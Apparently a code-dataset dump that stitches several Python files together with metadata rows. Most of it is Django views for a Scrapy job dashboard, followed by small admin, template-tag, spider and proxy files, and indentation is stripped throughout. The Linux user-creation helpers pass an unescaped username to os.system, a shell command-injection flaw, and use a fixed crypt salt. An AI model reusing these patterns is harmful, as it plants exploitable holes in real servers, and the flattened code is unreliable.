workerstatus['status'] = 'not delpoyed'
workerstatus['version'] = 'unknown'
except:
workerstatus['status'] = 'unreachable'
workerstatus['version'] = 'unknown'
allworkers.append(workerstatus)
counter += 1
return JsonResponse(allworkers, safe=False)
@login_required
def start_project(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'POST':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.post('%s/schedule.json' % linkgenaddress, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.post('%s/schedule.json' % workeraddress, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
return HttpResponse('sent start signal')
@login_required
def stop_project(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'POST':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.get('%s/listjobs.json' % linkgenaddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % linkgenaddress, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.get('%s/listjobs.json' % workeraddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % workeraddress, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
return HttpResponse('sent stop signal')
@login_required
def see_log_file(request, projectname, worker):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
if 'linkgenerator' in worker:
linkgenaddress = settings.LINK_GENERATOR
try:
r = requests.get('%s/listjobs.json' % linkgenaddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['finished'][-1]['id']
log = requests.get('%s/logs/%s/%s/%s.log' % (linkgenaddress, uniqueprojectname, uniqueprojectname, jobid))
except:
return HttpResponse('could not retrieve the log file')
elif 'worker' in worker:
workernumber = ''.join(x for x in worker if x.isdigit())
workernumber = int(workernumber)
workeraddress = settings.SCRAPERS[workernumber - 1]
try:
r = requests.get('%s/listjobs.json' % workeraddress,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['finished'][-1]['id']
log = requests.get('%s/logs/%s/%s/%s.log' % (workeraddress, uniqueprojectname, uniqueprojectname, jobid))
except:
return HttpResponse('could not retrieve the log file')
return HttpResponse(log.text, content_type='text/plain')
@login_required
def gather_status_for_all_projects(request):
projectsdict = {}
workers = []
for worker in settings.SCRAPERS:
workers.append(worker)
workers.append(settings.LINK_GENERATOR)
projects = Project.objects.filter(user=request.user)
for project in projects:
projectsdict[project.project_name] = []
project_items = Item.objects.filter(project=project)
for item in project_items:
projectsdict[project.project_name].append(item.item_name)
if request.method == 'POST':
if projectsdict:
allprojectdata = {}
for key in projectsdict:
workerstatus = {}
earliest_start_time = None
earliest_finish_time = None
latest_start_time = None
latest_finish_time = None
uniqueprojectname = request.user.username + '_' + key
for worker in workers:
try:
log = requests.get('%s/logs/%s/%s/stats.log' % (worker, uniqueprojectname, uniqueprojectname), timeout=(3, None))
if log.status_code == 200:
result = json.loads(log.text.replace("'", '"'))
if result.get('project_stopped', 0):
workerstatus['finished'] = workerstatus.get('finished', 0) + 1
else:
workerstatus['running'] = workerstatus.get('running', 0) + 1
if result.get('log_count/ERROR', 0):
workerstatus['errors'] = workerstatus.get('errors', 0) + result.get('log_count/ERROR', 0)
for item in projectsdict[key]:
if result.get(item, 0):
workerstatus['item-%s' % item] = workerstatus.get('item-%s' % item, 0) + result.get(item, 0)
if result.get('start_time', False):
start_time = dateutil.parser.parse(result['start_time'])
if earliest_start_time is None:
earliest_start_time = start_time
else:
if start_time < earliest_start_time:
earliest_start_time = start_time
if latest_start_time is None:
latest_start_time = start_time
else:
if start_time > latest_start_time:
latest_start_time = start_time
if result.get('finish_time', False):
finish_time = dateutil.parser.parse(result['finish_time'])
if earliest_finish_time is None:
earliest_finish_time = finish_time
else:
if finish_time < earliest_finish_time:
earliest_finish_time = finish_time
if latest_finish_time is None:
latest_finish_time = finish_time
else:
if finish_time > latest_finish_time:
latest_finish_time = finish_time
elif log.status_code == 404:
workerstatus['hasntlaunched'] = workerstatus.get('hasntlaunched', 0) + 1
else:
workerstatus['unknown'] = workerstatus.get('unknown', 0) + 1
except:
workerstatus['unknown'] = workerstatus.get('unknown', 0) + 1
if earliest_start_time is not None:
workerstatus['earliest_start_time'] = earliest_start_time.strftime("%B %d, %Y %H:%M:%S")
if earliest_finish_time is not None:
workerstatus['earliest_finish_time'] = earliest_finish_time.strftime("%B %d, %Y %H:%M:%S")
if latest_start_time is not None:
workerstatus['latest_start_time'] = latest_start_time.strftime("%B %d, %Y %H:%M:%S")
if latest_finish_time is not None:
workerstatus['latest_finish_time'] = latest_finish_time.strftime("%B %d, %Y %H:%M:%S")
allprojectdata[key] = workerstatus
return JsonResponse(allprojectdata, safe=True)
return HttpResponse('{}')
@login_required
def editsettings(request, settingtype, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
if settingtype == 'linkgenerator':
settingtext = project.settings_link_generator
form = Settings(initial={'settings': settingtext})
return render(request, "editsettings.html", {'username': request.user.username, 'project': projectname, 'form': form, 'settingtype': settingtype})
if settingtype == 'scraper':
settingtext = project.settings_scraper
form = Settings(initial={'settings': settingtext})
return render(request, "editsettings.html", {'username': request.user.username, 'project': projectname, 'form': form, 'settingtype': settingtype})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
if 'submit' in request.POST:
form = Settings(request.POST)
if form.is_valid():
if settingtype == "linkgenerator":
project.settings_link_generator = form.cleaned_data['settings']
project.save()
if settingtype == "scraper":
project.settings_scraper = form.cleaned_data['settings']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
else:
return render(request, "editsettings.html",
{'username': request.user.username, 'project': projectname, 'form': form,
'settingtype': settingtype})
@login_required
def start_project_on_all(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
workers.append(settings.LINK_GENERATOR)
for worker in settings.SCRAPERS:
workers.append(worker)
if request.method == 'POST':
for worker in workers:
try:
r = requests.post('%s/schedule.json' % worker, data={'project': uniqueprojectname, 'spider': uniqueprojectname}, timeout=(3, None))
except:
pass
return HttpResponse('sent start signal')
@login_required
def stop_project_on_all(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
workers = []
workers.append(settings.LINK_GENERATOR)
for worker in settings.SCRAPERS:
workers.append(worker)
if request.method == 'POST':
for worker in workers:
try:
r = requests.get('%s/listjobs.json' % worker,
params={'project': uniqueprojectname}, timeout=(3, None))
result = r.json()
jobid = result['running'][0]['id']
s = requests.post('%s/cancel.json' % worker, params={'project': uniqueprojectname, 'job': jobid}, timeout=(3, None))
except:
pass
return HttpResponse('sent stop signal')
@login_required
def get_global_system_status(request):
status = {}
workers = []
for worker in settings.SCRAPERS:
workers.append(worker)
worker_count = 0
for worker in workers:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse(worker).hostname
port = int(urlparse(worker).port)
result = sock.connect_ex((host, port))
if result == 0:
worker_count += 1
except:
pass
finally:
sock.close()
status['scrapers'] = worker_count
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse(settings.LINK_GENERATOR).hostname
port = int(urlparse(settings.LINK_GENERATOR).port)
result = sock.connect_ex((host, port))
if result == 0:
status['linkgenerator'] = True
else:
status['linkgenerator'] = False
except:
status['linkgenerator'] = False
finally:
sock.close()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
result = sock.connect_ex((settings.RABBITMQ_HOST, settings.RABBITMQ_PORT))
if result == 0:
status['queue'] = True
else:
status['queue'] = False
except:
status['queue'] = False
finally:
sock.close()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
host = urlparse("http://" + settings.MONGODB_URI).hostname
port = int(urlparse("http://" + settings.MONGODB_URI).port)
result = sock.connect_ex((host, port))
if result == 0:
status['database'] = True
else:
status['database'] = False
except:
status['database'] = False
finally:
sock.close()
status['databaseaddress'] = settings.MONGODB_PUBLIC_ADDRESS
return JsonResponse(status, safe=False)
@login_required
def share_db(request, projectname):
uniqueprojectname = request.user.username + '_' + projectname
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = ShareDB()
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = ShareDB(request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
if uname == request.user.username:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User name %s is your own account name.' % uname)
return render(request, 'sharedb.html',
{'username': request.user.username, 'form': form, 'projectname': projectname})
try:
username = User.objects.get(username=uname)
except User.DoesNotExist:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User %s does not exist in the system.' % uname)
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
#start thread here
thr = threading.Thread(target=sharing_db, args=(uniqueprojectname, username.username, projectname, request.user.username), kwargs={})
thr.start()
return render(request, 'sharedb_started.html',
{'username': request.user.username})
else:
return render(request, 'sharedb.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
@login_required
def share_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = ShareProject()
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = ShareProject(request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
if uname == request.user.username:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User name %s is your own account name.' % uname)
return render(request, 'shareproject.html',
{'username': request.user.username, 'form': form, 'projectname': projectname})
try:
username = User.objects.get(username=uname)
except User.DoesNotExist:
errors = form._errors.setdefault("username", ErrorList())
errors.append('User %s does not exist in the system.' % uname)
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
#start thread here
thr = threading.Thread(target=sharing_project, args=(username.username, projectname, request.user.username), kwargs={})
thr.start()
return HttpResponseRedirect(reverse("mainpage"))
else:
return render(request, 'shareproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
def sharing_db(dbname, target_user, projectname, username):
target_db_name = '%s_sharedby_%s' % (projectname, username)
targetuser = User.objects.get(username=target_user)
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
existing_dbs = connection.database_names()
checked_all_database_names = 0
db_version = 1
while not checked_all_database_names:
checked_all_database_names = 1
for onedbname in existing_dbs:
if str(onedbname) == target_db_name:
target_db_name += str(db_version)
db_version += 1
checked_all_database_names = 0
existing_dbs = connection.database_names()
database = connection[dbname]
if settings.MONGODB_SHARDED:
try:
connection.admin.command('enableSharding', target_db_name)
except:
pass
collections = database.collection_names()
for i, collection_name in enumerate(collections):
if collection_name != u'system.indexes':
if settings.MONGODB_SHARDED:
try:
connection.admin.command('shardCollection', '%s.%s' % (target_db_name, collection_name),
key={'_id': "hashed"})
except:
pass
col = connection[dbname][collection_name]
insertcol = connection[target_db_name][collection_name]
skip = 0
collection = col.find(filter={}, projection={'_id': False}, limit=100, skip=skip*100)
items = []
for item in collection:
items.append(item)
while len(items) > 0:
skip += 1
insertcol.insert_many(items)
collection = col.find(filter={}, projection={'_id': False}, limit=100, skip=skip * 100)
items = []
for item in collection:
items.append(item)
connection.admin.command('grantRolesToUser', target_user,
roles=[{'role': 'dbOwner', 'db': target_db_name}])
dataset = Dataset()
dataset.user = targetuser
dataset.database = target_db_name
dataset.save()
connection.close()
def sharing_project(target_user, projectname, username):
target_project_name = '%s_sharedby_%s' % (projectname, username)
targetuser = User.objects.get(username=target_user)
project = Project.objects.get(user=User.objects.get(username=username), project_name=projectname)
newproject = Project(user=targetuser, project_name=target_project_name, link_generator=project.link_generator,
scraper_function=project.scraper_function, settings_scraper=project.settings_scraper,
settings_link_generator=project.settings_link_generator)
newproject.save()
items = Item.objects.filter(project=project)
for item in items:
newitem = Item(item_name=item.item_name, project=newproject)
newitem.save()
fields = Field.objects.filter(item=item)
for field in fields:
newfield = Field(item=newitem, field_name=field.field_name)
newfield.save()
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
newpipeline = Pipeline(project=newproject, pipeline_function=pipeline.pipeline_function,
pipeline_name=pipeline.pipeline_name, pipeline_order=pipeline.pipeline_order)
newpipeline.save()
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('grantRolesToUser', target_user,
roles=[{'role': 'dbOwner', 'db': target_user + '_' + target_project_name}])
dataset = Dataset()
dataset.user = targetuser
dataset.database = target_user + '_' + target_project_name
dataset.save()
connection.close()
def mongodb_user_creation(username, password):
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('createUser', username, pwd=password, roles=[])
connection.close()
def mongodb_user_password_change(username, password):
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('updateUser', username, pwd=password)
connection.close()
def linux_user_creation(username, password):
encpass = crypt.crypt(password, "2424")
os.system("useradd -p " + encpass + " %s" % username)
os.system("mkdir /home/%s" % username)
os.system("chown %s:%s /home/%s" % (username, username, username))
def linux_user_pass_change(username, password):
encpass = crypt.crypt(password, "2424")
os.system("usermod -p " + encpass + " %s" % username)
@login_required
def database_preview(request, db):
datasets = Dataset.objects.filter(user=request.user)
databases = []
for dataset in datasets:
databases.append(dataset.database)
if db not in databases:
return HttpResponseNotFound('Nothing is here.')
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(
settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
database = connection[db]
preview_data = {}
collections = database.collection_names()
for i, collection_name in enumerate(collections):
if collection_name != u'system.indexes':
col = database[collection_name]
collection = col.find(filter={}, projection={'_id': False}, limit=10, skip=0)
items = []
for item in collection:
items.append(item)
preview_data[collection_name] = json.dumps(items, ensure_ascii=False)
return render(request, template_name="databasepreview.html",
context={'username': request.user.username, 'databases': databases, 'preview_data': preview_data})
|
Python
| 1,663
| 42.61335
| 181
|
/Web-UI/scrapyproject/views.py
| 0.59794
| 0.594783
|
mrpal39/ev_code
|
refs/heads/master
|
from django.contrib import admin
from .models import Products,feeds,MyModel,Post
# Register your models here.
admin.site.register(Products)
admin.site.register(feeds)
admin.site.register(MyModel)
admin.site.register(Post)
|
Python
| 9
| 23.888889
| 47
|
/awssam/ideablog/core/admin.py
| 0.8125
| 0.8125
|
mrpal39/ev_code
|
refs/heads/master
|
from django.contrib import admin
# Register your models here.
from blog.models import Tag, Article, Category
@admin.register(Article)
class ArticleAdmin(admin.ModelAdmin):
date_hierarchy = 'date_time'
list_display = ('title', 'category', 'author', 'date_time', 'view')
list_filter = ('category', 'author')
filter_horizontal = ('tag',)
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
pass
@admin.register(Tag)
class TagAdmin(admin.ModelAdmin):
pass
|
Python
| 24
| 19.75
| 71
|
/awssam/django-blog/src/blog/admin.py
| 0.706827
| 0.706827
|
mrpal39/ev_code
|
refs/heads/master
|
from django import template
from django.db.models import Q
from django.conf import settings
from django.template.defaultfilters import stringfilter
from django.utils.safestring import mark_safe
import random
from django.urls import reverse
# from blog.models import Article, Category, Tag, Links, SideBar, LinkShowType
from django.utils.encoding import force_text
from django.shortcuts import get_object_or_404
import hashlib
import urllib
# from comments.models import Comment
from DjangoBlog.utils import cache_decorator, cache
from django.contrib.auth import get_user_model
from oauth.models import OAuthUser
from DjangoBlog.utils import get_current_site
import logging
logger = logging.getLogger(__name__)
register = template.Library()
@register.simple_tag
def timeformat(data):
try:
return data.strftime(settings.TIME_FORMAT)
# print(data.strftime(settings.TIME_FORMAT))
# return "ddd"
except Exception as e:
logger.error(e)
return ""
@register.simple_tag
def datetimeformat(data):
try:
return data.strftime(settings.DATE_TIME_FORMAT)
except Exception as e:
logger.error(e)
return ""
@register.filter(is_safe=True)
@stringfilter
def custom_markdown(content):
from DjangoBlog.utils import CommonMarkdown
return mark_safe(CommonMarkdown.get_markdown(content))
|
Python
| 52
| 25.346153
| 78
|
/myapi/fullfeblog/blog/blog_tags.py
| 0.750547
| 0.748359
|
mrpal39/ev_code
|
refs/heads/master
|
import scrapy
class DemoSpider(scrapy.Spider):
name = 'demo'
start_urls = ['http://www.something.com/users/login.php']
def parse(self, response):
return scrapy.FormRequest.from_response(
response,
formdata = {'username': 'admin', 'password': 'confidential'},
callback = self.after_login
)
def after_login(self, response):
if "authentication failed" in response.body:
self.logger.error("Login failed")
return
# You can continue scraping here
|
Python
| 16
| 32.875
| 69
|
/scrap/tuto/tuto/spiders/dataviaHTTPPOST.py
| 0.608133
| 0.608133
|
mrpal39/ev_code
|
refs/heads/master
|
from django.contrib import admin
from django.urls import path,include
from django.conf import settings
from django.conf.urls.static import static
from django.contrib.sitemaps.views import sitemap
from blog.sitemaps import PostSitemap
from django.conf.urls import url, include
# from .. import core
sitemaps={
'posts':PostSitemap,
}
urlpatterns = [
path('admin/', admin.site.urls, ),
path('',include('blog.urls')),
path('core/',include('core.urls')),
path('api/',include('api.urls')),
# path('oauth/',include('oauth.urls')),
path('accounts/', include('allauth.urls')),
path('sitemap.xml', sitemap, {'sitemaps': sitemaps},
name='django.contrib.sitemaps.views.sitemap')
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
Python
| 24
| 31.416666
| 65
|
/myapi/fullfeblog/webdev/urls.py
| 0.70399
| 0.70399
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
import random
import requests
def GetIps():
li=[]
global count
url ='http://139.199.182.250:8000/?types=0&count=300'
ips=requests.get(url)
for ip in eval(ips.content):
li.append(ip[0]+':'+ip[1])
return li
GetIps()
|
Python
| 13
| 19.76923
| 56
|
/tc_zufang/tc_zufang-slave/tc_zufang/utils/GetProxyIp.py
| 0.592593
| 0.511111
|
mrpal39/ev_code
|
refs/heads/master
|
from .settings import *
from .dev import *
# Test codehilite with pygments
WIKI_MARKDOWN_KWARGS = {
"extensions": [
"codehilite",
"footnotes",
"attr_list",
"headerid",
"extra",
]
}
|
Python
| 13
| 16.76923
| 31
|
/awssam/wikidj/wikidj/codehilite.py
| 0.541126
| 0.541126
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.